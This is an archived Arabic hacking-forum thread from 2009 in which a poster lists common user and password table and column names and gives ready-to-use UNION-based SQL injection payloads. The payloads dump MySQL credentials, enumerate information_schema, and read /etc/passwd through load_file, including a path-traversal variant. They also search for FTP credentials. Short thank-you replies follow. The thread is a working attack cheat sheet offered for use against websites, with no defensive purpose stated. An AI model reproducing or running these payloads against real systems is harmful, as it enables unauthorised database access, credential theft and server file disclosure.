:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن (http://www.vbspiders.com/vb/showthread.php?t=4515)

عاشق الفيروسات 02-03-2009 12:24 AM
اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
 

اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن

اقتباس:
user & users & username & admin & adminlogim & login & member & membername

user_name

الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن

اقتباس:
password & pass & passwd & pwd
اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس

اقتباس:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن

الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل

اقتباس:
union+select+1,2,user,4,5+from+mysql.user
ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل

اقتباس:
union+select+1,2,password,4,5+from+mysql.user
مثال اخر على الكلمات السابقه للتوضيع

اقتباس:
union+select+1,2,membername,4,5+from+smf_members
لاستخراج الجداول في قواعد البيانات وقت الحقن

اقتباس:
union+select+1,2,table_name,4,5+from+information_s chema.tables
لاستخراج الاعمده في قواحد البيانات وقت الحقن

اقتباس:
union+select+1,2,column_name,4,5+from+information_ schema.columns
الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل

طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً

اقتباس:
union+select+1,2,username,4,5+from+users+where+use rid=1/*
الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه

اقتباس:
load_file("/هنا الاوامر")
مثال على هذا

اقتباس:
union+select+1,load_file("/"),3,4+from+mysql.user
وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر

اقتباس:
union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user
او نجرب هذا نفس الامر بس نتراجع للخلف

اقتباس:
union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user
الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن

هذا الامر خاص بالبحث في الجداول

اقتباس:
union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/*

هذا الامر خاص بالبحث في الاعمده

اقتباس:
union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/*
FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ

اقتباس:
'%25ftp%25' <<< في هذا الامر
تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة

اقتباس:
'%25user%25' & '%25logim%25'
يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني

ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي

تحياتي عاشق الفيروسات

●๋•ஜ ⋋MATRX H@!L⋌ ஜ●๋• 02-06-2009 05:57 PM
مشكـــــــور يا قلبي
انا فدى العرقــ خييو

تقبل تحيإتــى...

MrXRoMaNcE1 02-06-2009 11:05 PM
مشككور على تخمينات يعطيك العافية

SnIpEr-Ma 08-19-2010 02:05 AM
thanks you men


الساعة الآن 08:08 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0